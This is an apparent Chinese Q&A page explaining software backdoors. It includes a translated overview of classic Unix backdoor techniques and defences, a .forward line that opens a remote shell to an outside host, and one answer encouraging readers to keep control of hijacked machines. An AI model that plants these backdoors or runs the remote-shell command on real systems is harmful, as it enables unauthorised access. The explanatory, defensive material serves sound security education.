當前位置:首頁 » 挖礦知識 » 挖礦軟體後門是什麼意思

挖礦軟體後門是什麼意思

發布時間: 2021-06-15 18:11:04

Ⅰ 什麼是軟體後門每個軟體都有嗎

軟體後門就是製作者為了自己的權利.設置的軟體的注冊.等東西.像有的軟體就要注冊碼了.但有的軟體不要注冊碼.

Ⅱ 軟體有後門是什麼意思

軟體帶後門就是軟體上有作者故意留下的,安全隱患,或對作者有利的東西,比如可以控制你的電腦,或者你弄的東西作者可以收到這方面的信息。

Ⅲ 什麼是後門怎麼才能發現一款軟體有後門

當一個訓練有素的程序員設計一個功能較復雜的軟體時,都習慣於先將整個軟體分割為若干模塊,然後再對各模塊單獨設計、調試,而後門則是一個模塊的秘密入口。在程序開發期間,後門的存在是為了便於測試、更改和增強模塊的功能。當然,程序員一般不會把後門記入軟體的說明文檔,因此用戶通常無法了解後門的存在。
/按照正常操作程序,在軟體交付用戶之前,程序員應該去掉軟體模塊中的後門,但是,由於程序員的疏忽,或者故意將其留在程序中以便日後可以對此程序進行隱蔽的訪問,方便測試或維護已完成的程序等種種原因,實際上並未去掉。
這樣,後門就可能被程序的作者所秘密使用,也可能被少數別有用心的人用窮舉搜索法發現利用。

http://cache..com/c?word=%CA%B2%C3%B4%3B%CA%C7%3B%BA%F3%C3%C5&url=http%3A//www%2Exiaom%2Ecom/Article%5Fshow%2Easp%3FArticleID%3D4777&b=0&a=29&user=

什麼是後門?
從早期的計算機入侵者開始,他們就努力發展能使自己重返被入侵系統的技術或後門.本文將討論許多常見的後門及其檢測方法. 更多的焦點放在Unix系統的後門,同時討論一些未來將會出現的Windows NT的後門. 本文將描述如何測定入侵者使用的方法這樣的復雜內容和管理員如何防止入侵者重返的基礎知識. 當管理員懂的一旦入侵者入侵後要制止他們是何等之難以後, 將更主動於預防第一次入侵. 本文試圖涉及大量流行的初級和高級入侵者製作後門的手法, 但不會也不可能覆蓋到所有可能的方法.

大多數入侵者的後門實現以下二到三個目的:

即使管理員通過改變所有密碼類似的方法來提高安全性,仍然能再次侵入. 使再次侵入被發現的可能性減至最低.大多數後門設法躲過日誌, 大多數情況下即使入侵者正在使用系統也無法顯示他已在線. 一些情況下, 如果入侵者認為管理員可能會檢測到已經安裝的後門, 他們以系統的 脆弱性作為唯一的後門, 重而反復攻破機器. 這也不會引起管理員的注意. 所以在 這樣的情況下,一台機器的脆弱性是它唯一未被注意的後門.

密碼破解後門

這是入侵者使用的最早也是最老的方法, 它不僅可以獲得對Unix機器的訪問, 而且可以通過破解密碼製造後門. 這就是破解口令薄弱的帳號. 以後即使管理員封了入侵者的當前帳號,這些新的帳號仍然可能是重新侵入的後門. 多數情況下, 入侵者尋找口令薄弱的未使用帳號,然後將口令改的難些. 當管理員尋找口令薄弱的帳號是, 也不會發現這些密碼已修改的帳號.因而管理員很難確定查封哪個帳號.

Rhosts + + 後門

在連網的Unix機器中,象Rsh和Rlogin這樣的服務是基於rhosts文件里的主機名使用簡單的認證方法. 用戶可以輕易的改變設置而不需口令就能進入. 入侵者只要向可以訪問的某用戶的rhosts文件中輸入"+ +", 就可以允許任何人從任何地方無須口令便能進入這個帳號. 特別當home目錄通過NFS向外共享時, 入侵者更熱中於此. 這些帳號也成了入侵者再次侵入的後門. 許多人更喜歡使用Rsh, 因為它通常缺少日誌能力. 許多管
理員經常檢查 "+ +", 所以入侵者實際上多設置來自網上的另一個帳號的主機名和用戶名,從而不易被發現.

校驗和及時間戳後門

早期,許多入侵者用自己的trojan程序替代二進制文件. 系統管理員便依*時間戳和系統校驗和的程序辨別一個二進制文件是否已被改變, 如Unix里的sum程序. 入侵者又發展了使trojan文件和原文件時間戳同步的新技術. 它是這樣實現的: 先將系統時鍾撥回到原文件時間, 然後調整trojan文件的時間為系統時間. 一旦二進制trojan文件與原來的精確同步, 就可以把系統時間設回當前時間. sum程序是基於CRC校驗, 很容易
騙過.入侵者設計出了可以將trojan的校驗和調整到原文件的校驗和的程序. MD5是被大多數人推薦的,MD5使用的演算法目前還沒人能騙過.

Login後門

在Unix里,login程序通常用來對telnet來的用戶進行口令驗證. 入侵者獲取login.c的原代碼並修改,使它在比較輸入口令與存儲口令時先檢查後門口令. 如果用戶敲入後門口令,它將忽視管理員設置的口令讓你長驅直入. 這將允許入侵者進入任何帳號,甚至是root.由於後門口令是在用戶真實登錄並被日誌記錄到utmp和wtmp前產生一個訪問的, 所以入侵者可以登錄獲取shell卻不會暴露該帳號. 管理員注意到這種後門後, 便
用"strings"命令搜索login程序以尋找文本信息. 許多情況下後門口令會原形畢露.入侵者就開始加密或者更好的隱藏口令, 使strings命令失效. 所以更多的管理員是用MD5校驗和檢測這種後門的.

Telnetd後門

當用戶telnet到系統, 監聽埠的inetd服務接受連接隨後遞給in.telnetd,由它運行login.一些入侵者知道管理員會檢查login是否被修改, 就著手修改in.telnetd.在in.telnetd內部有一些對用戶信息的檢驗, 比如用戶使用了何種終端. 典型的終端設置是Xterm或者VT100.入侵者可以做這樣的後門, 當終端設置為"letmein"時產生一個不要任何驗證的shell. 入侵者已對某些服務作了後門, 對來自特定源埠的連接產
生一個shell .

服務後門

幾乎所有網路服務曾被入侵者作過後門. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本隨處多是. 有的只是連接到某個TCP埠的shell,通過後門口令就能獲取訪問.這些程序有時用刺媧□?ucp這樣不用的服務,或者被加入inetd.conf作為一個新的服務.管理員應該非常注意那些服務正在運行, 並用MD5對原服務程序做校驗.

Cronjob後門

Unix上的Cronjob可以按時間表調度特定程序的運行. 入侵者可以加入後門shell程序使它在1AM到2AM之間運行,那麼每晚有一個小時可以獲得訪問. 也可以查看cronjob中經常運行的合法程序,同時置入後門.

庫後門

幾乎所有的UNIX系統使用共享庫. 共享庫用於相同函數的重用而減少代碼長度. 一些入侵者在象crypt.c和_crypt.c這些函數里作了後門. 象login.c這樣的程序調用了crypt(),當使用後門口令時產生一個shell. 因此, 即使管理員用MD5檢查login程序,仍然能產生一個後門函數.而且許多管理員並不會檢查庫是否被做了後門.對於許多入侵者來說有一個問題: 一些管理員對所有東西多作了MD5校驗. 有一種辦法是入侵者對open()和文件訪問函數做後門. 後門函數讀原文件但執行trojan後門程序. 所以 當MD5讀這些文件時,校驗和一切正常. 但當系統運行時將執行trojan版本的. 即使trojan庫本身也可躲過MD5校驗. 對於管理員來說有一種方法可以找到後門, 就是靜態編連MD5校驗程序然後運行.靜態連接程序不會使用trojan共享庫.

內核後門

內核是Unix工作的核心. 用於庫躲過MD5校驗的方法同樣適用於內核級別,甚至連靜態連接多不能識別. 一個後門作的很好的內核是最難被管理員查找的, 所幸的是內核的後門程序還不是隨手可得, 每人知道它事實上傳播有多廣.

文件系統後門

入侵者需要在伺服器上存儲他們的掠奪品或數據,並不能被管理員發現. 入侵者的文章常是包括exploit腳本工具,後門集,sniffer日誌,email的備分,原代碼,等等. 有時為了防止管理員發現這么大的文件, 入侵者需要修補"ls","","fsck"以隱匿特定的目錄和文件.在很低的級別, 入侵者做這樣的漏洞: 以專有的格式在硬碟上割出一部分,且表示為壞的扇區. 因此入侵者只能用特別的工具訪問這些隱藏的文件. 對於普通的
管理員來說, 很難發現這些"壞扇區"里的文件系統, 而它又確實存在.

Boot塊後門

在PC世界裡,許多病毒藏匿與根區, 而殺病毒軟體就是檢查根區是否被改變. Unix下,多數管理員沒有檢查根區的軟體, 所以一些入侵者將一些後門留在根區.

隱匿進程後門

入侵者通常想隱匿他們運行的程序. 這樣的程序一般是口令破解程序和監聽程序 (sniffer).有許多辦法可以實現,這里是較通用的: 編寫程序時修改自己的argv[]使它看起來象其他進程名. 可以將sniffer程序改名類似in.syslog再執行. 因此當管理員用"ps"檢查運行進程時, 出現 的是標准服務名. 可以修改庫函數致使
"ps"不能顯示所有進程. 可以將一個後門或程序嵌入中斷驅動程序使它不會在進程表顯現. 使用這個技術的一個後門例子是amod.tar.gz :

http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

也可以修改內核隱匿進程.

Rootkit

最流行的後門安裝包之一是rootkit. 它很容易用web搜索器找到.從Rootkit的README里,可以找到一些典型的文件:

z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.

網路通行後門

入侵者不僅想隱匿在系統里的痕跡, 而且也要隱匿他們的網路通行. 這些網路通行後門有時允許入侵者通過防火牆進行訪問. 有許多網路後門程序允許入侵者建立某個埠號並不用通過普通服務就能實現訪問. 因為這是通過非標准網路埠的通行, 管理員可能忽視入侵者的足跡. 這種後門通常使用TCP,UDP和ICMP, 但也可能是其他類型報文.

TCP Shell 後門

入侵者可能在防火牆沒有阻塞的高位TCP埠建立這些TCP Shell後門. 許多情況下,他們用口令進行保護以免管理員連接上後立即看到是shell訪問. 管理員可以用netstat命令查看當前的連接狀態, 那些埠在偵聽, 目前連接的來龍去脈. 通常這些後門可以讓入侵者躲過TCP Wrapper技術. 這些後門可以放在SMTP埠, 許多防火牆允許e-mail通行的.

UDP Shell 後門

管理員經常注意TCP連接並觀察其怪異情況, 而UDP Shell後門沒有這樣的連接, 所以netstat不能顯示入侵者的訪問痕跡. 許多防火牆設置成允許類似DNS的UDP報文的通行. 通常入侵者將UDP Shell放置在這個埠, 允許穿越防火牆.

ICMP Shell 後門

Ping是通過發送和接受ICMP包檢測機器活動狀態的通用辦法之一. 許多防火牆允許外界ping它內部的機器. 入侵者可以放數據入Ping的ICMP包, 在ping的機器間形成一個shell通道. 管理員也許會注意到Ping包暴風, 但除了他查看包內數據, 否者入侵者不會暴露.

加密連接

管理員可能建立一個sniffer試圖某個訪問的數據, 但當入侵者給網路通行後門加密後,就不可能被判定兩台機器間的傳輸內容了.

Windows NT

由於Windows NT不能輕易的允許多個用戶象Unix下訪問一台機器, 對入侵者來說就很難闖入Windows NT,安裝後門,並從那裡發起攻擊. 因此你將更頻繁地看到廣泛的來自Unix的網路攻擊. 當Windows NT提高多用戶技術後, 入侵者將更頻繁地利用 WindowsNT.如果這一天真的到來, 許多Unix的後門技術將移植到Windows NT上, 管理員可以等候入侵者的到來. 今天, Windows NT已經有了telnet守護程序. 通過網路通行後門, 入侵者發現在Windows NT安裝它們是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此處該如何翻譯? :(

解決

當後門技術越先進, 管理員越難於判斷入侵者是否侵入後者他們是否被成功封殺.

評估

首先要做的是積極准確的估計你的網路的脆弱性, 從而判定漏洞的存在且修復之.許多商業工具用來幫助掃描和查核網路及系統的漏洞. 如果僅僅安裝提供商的安全補丁的話,許多公司將大大提高安全性.

MD5基準線

一個系統(安全)掃描的一個重要因素是MD5校驗和基準線. MD5基準線是在黑客入侵前由干凈系統建立. 一旦黑客入侵並建立了後門再建立基準線, 那麼後門也被合並進去了.一些公司被入侵且系統被安置後門長達幾個月.所有的系統備份多包含了後門. 當公司發現有黑客並求助備份祛除後門時, 一切努力是徒勞的, 因為他們恢復系統的同時也恢復了後門. 應該在入侵發生前作好基準線的建立.

入侵檢測

隨著各種組織的上網和允許對自己某些機器的連接,入侵檢測正變的越來越重要.以前多數入侵檢測技術是基於日誌型的. 最新的入侵檢測系統技術(IDS)是基於實時偵聽和網路通行安全分析的. 最新的IDS技術可以瀏覽DNS的UDP報文, 並判斷是否符合DNS協議請求. 如果數據不符合協議, 就發出警告信號並抓取數據進行進一步分析. 同樣的原則可以運用到ICMP包, 檢查數據是否符合協議要求, 或者是否裝載加密shell會話.

從CD-ROM啟動

一些管理員考慮從CD-ROM啟動從而消除了入侵者在CD-ROM上做後門的可能性.這種方法的問題是實現的費用和時間夠企業面臨的.

警告

由於安全領域變化之快, 每天有新的漏洞被公布, 而入侵者正不斷設計新的攻擊和安置後門技術, 安枕無憂的安全技術是沒有的.請記住沒有簡單的防禦,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句該如何翻譯? :( )
-------------------------------------------------------------------------
you may want to add:

.forward Backdoor

On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"

permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).

PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
&nbs>

the client and server).

> Using smrsh can effectively negate this backdoor (although it's quite
> possibly still a problem if you allow things like elm's filter or
> procmail which can run programs themselves...).

你也許要增加:

.forward後門

Unix下在.forward文件里放入命令是重新獲得訪問的常用方法. 帳戶'username'的.forward可能設置如下:

\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"

這種方法的變形包括改變系統的mail的別名文件(通常位於/etc/aliases). 注意這只是一種簡單的變換. 更為高級的能夠從.forward中運行簡單腳本實現在標准輸入執行任意命令(小部分預處理後).>利用smrsh可以有效的制止這種後門(雖然如果允許可以自運行的elm's filter或 procmail>類程序, 很有可能還有問題 ......)
參考資料:..com

Ⅳ 什麼叫開後門開後門軟體是干什麼的

後門軟體是利用軟體做服務,然後刻意造成可入侵的入口。以便以後方便利用後門軟體簡單的入侵你的計算機

Ⅳ 怎麼確定軟體有後門

繞過安全性控制而獲取對程序或系統訪問權的方法。在軟體的開發階段,程序員常會在軟體內創建後門以便可以修改程序中的缺陷。如果後門被其他人知道,或是在發布軟體之前沒有刪除後門,那麼它就成了安全風險。後門又稱為Back Door —— 談到它,就不得不先提一下相關知識:大家都知道,一台計算機上有0到65535共65536個埠,那麼如果把計算機看作是一間屋子,那麼這65536個埠就可以把它看做是計算機為了與外界連接所開的65536扇門。為什麼需要那麼多扇門呢?因為主人的事務很繁忙,它為了同時處理很多應酬,就決定每扇門只對一項應酬的工作。所以有的門是主人特地打開迎接客人的(提供服務),有的門是主人為了出去訪問客人而開設的(訪問遠程服務)——理論上,剩下的其他門都該是關閉著的,但偏偏因為各種原因,有的門在主人都不知道的情形下,卻被悄然開啟。於是就有好事者進入,主人的隱私被刺探,生活被打擾,甚至屋裡的東西也被搞得一片狼藉。這扇悄然被開啟的門——就是今天我們要講的「後門」。當然,這只是一個比喻,事實上除了通過埠連接外,也可以通過串/並口,無線設備連接的方式進行入侵,為了行文方便,以下文中的「埠」泛指各種對外介面(interface)。
後門產生的必要條件
後門產生的必要條件有以下三點:
1.必須以某種方式與其他終端節點相連——由於後門的利用都是從其他節點進行訪問,因此必須與目標機使用雙絞線、光纖維、串/並口、藍牙、紅外等設備在物理信號上有所連接才可以對埠進行訪問。只有訪問成功,雙方才可以進行信號交流,攻擊方才有機會進行入侵。
2.目標機默認開放的可供外界訪問的埠必須在一個以上——因為一台默認無任何埠開放的機器是無法連接通信的,而如果開放著的埠外界無法訪問,則同樣沒有辦法進行入侵。
3.目標機存在程序設計或人為疏忽,導致攻擊者能以許可權較高的身份執行程序。並不是任何一個許可權的帳號都能夠被利用的,只有許可權達到操作系統一定要求的才允許執行修改注冊表,修改log記錄等相關修改。

Ⅵ 什麼是後門程序

後門程序一般是指那些繞過安全性控制而獲取對程序或系統訪問權的程序方法。在軟體的開發階段,程序員常常會在軟體內創建後門程序以便可以修改程序設計中的缺陷。但是,如果這些後門被其他人知道,或是在發布軟體之前沒有刪除後門程序,那麼它就成了安全風險,容易被黑客當成漏洞進行攻擊。 與木馬的關系 後門程序,跟我們通常所說的"木馬"有聯系也有區別. 聯系在於:都是隱藏在用戶系統中向外發送信息,而且本身具有一定許可權,以便遠程機器對本機的控制. 區別在於:木馬是一個完整的軟體,而後門則體積較小且功能都很單一. 而且,在病毒命名中,後門一般帶有backdoor字樣,而木馬一般則是trojan字樣. 具體含義後門程序又稱特洛依木馬,其用途在於潛伏在電腦中,從事搜集信息或便於黑客進入的動作。後門程序和電腦病毒最大的差別,在於後門程序不一定有自我復制的動作,也就是後門程序不一定會「感染」其它電腦。 後門是一種登錄系統的方法,它不僅繞過系統已有的安全設置,而且還能挫敗系統上各種增強的安全設置。 後門的類型後門包括從簡單到奇特,有很多的類型。簡單的後門可能只是建立一個新的賬號,或者接管一個很少使用的賬號;復雜的後門(包括木馬)可能會繞過系統的安全認證而對系統有安全存取權。例如一個login程序,你當輸入特定的密碼時,你就能以管理員的許可權來存取系統。 後門能相互關聯,而且這個 技術被許多黑客所使用。例如,黑客可能使用密碼破解一個或多個賬號密碼,黑客可能會建立一個或多個賬號。一個黑客可以存取這個系統,黑客可能使用一些 技術或利用系統的某個漏洞來提升許可權。黑客可能使用一些技術或利用系統的某個漏洞來提升許可權。黑客可能會對系統的配置文件進行小部分的修改,以降低系統的防衛性能。也可能會安裝一個木馬程序,使系統打開一個安全漏洞,以利於黑客完全掌握系統。 以上是在網路上常見的對「後門」的解釋,其實我們可以用很簡單的一句話來概括它:後門就是留在計算機系統中,供某位特殊使用都通過某種特殊方式控制計算機系統的途徑!——很顯然,掌握好後門技術是每個網路安全愛好者不可或缺的一項基本技能!它能讓你牢牢抓住肉雞,讓它永遠飛不出你的五指山! 下文將以筆者從事網路安全多年的工作經驗為基礎,給廣大的網路初級安全愛好者講解一些網路上常 用的後門的種類和使用方法以及技巧,希望大家能在最短的時間內學習到最好的技術,提升自己的網路安全技術水平! 後門的分類後門可以按照很多方式來分類,標准不同自然分類就不同,為了便於大家理解,我們從技術方面來考慮後門程序的分類方法:網頁後門此類後門程序一般都是伺服器上正常 的web服務來構造自己的連接方式,比如現在非常流行的ASP、cgi腳本後門等。 線程插入後門 利用系統自身的某個服務或者線程,將後門程序插入到其中,具體原理原來《黑客防線》曾具體講解過,感興趣的朋友可以查閱。這也是現在最流行的一個後門技術。 擴展後門所謂的「擴展」,是指在功能上有大的提升,比普通的單一功能的後門有很強的使用性,這種後門本身就相當於一個小的安全工具包,能實現非常多的常駐見安全功能,適合新手使用————但是,功能越強,個人覺得反而脫郭後門「隱蔽」的初衷,具體看法就看各位使用都的喜好了。 c/s後門和傳統的木馬程序類似的控制方法,採用「客記端/服務端」的控制方式,通過某種特定的訪問方式來啟動後門進而控制伺服器。

Ⅶ 軟體無後門是什麼意思

後門(Back Door)是指一種繞過安全性控制而獲取對程序或系統訪問權的方法。在軟體的開發階段,程序員常會在軟體內創建後門以便可以修改程序中的缺陷。如果後門被其他人知道,或是在發布軟體之前沒有刪除,那麼它就成了安全隱患。

軟體無後門證明是沒有病毒和惡意攻擊的軟體

Ⅷ 很多人說程序的「後門」是什麼

後門指的是系統中毒後,病毒及木馬留下來的一個系統埠,可任遠程計算機來操作的一個口令,如果兩把鑰匙想匹配那麼這門就開了,他就可以控制你的系統了,這就是這么去解決了,然後後門又分為,主動跟被動,一個是門開著等你,只有你知道這個門開在哪裡(1024-65535之間的一個門),剩下的就是主動了,就是他會自己對這條路(ip或者是域名)來的自動開門

熱點內容
區塊鏈自媒體寫的較好的人 發布:2025-06-28 21:06:18 瀏覽:514
礦老闆炒比特幣嗎 發布:2025-06-28 20:54:25 瀏覽:636
btc單位符號 發布:2025-06-28 20:17:15 瀏覽:671
誇克區塊鏈獲得積分 發布:2025-06-28 19:24:20 瀏覽:222
類似於btc 發布:2025-06-28 19:22:33 瀏覽:287
DLC數字貨幣吧 發布:2025-06-28 19:10:25 瀏覽:545
btc賣比特幣 發布:2025-06-28 18:43:17 瀏覽:123
去宜家薈聚購物中心 發布:2025-06-28 18:23:48 瀏覽:939
跟比特幣相關的上市公司 發布:2025-06-28 18:17:32 瀏覽:706
藍精靈數字貨幣 發布:2025-06-28 18:07:01 瀏覽:634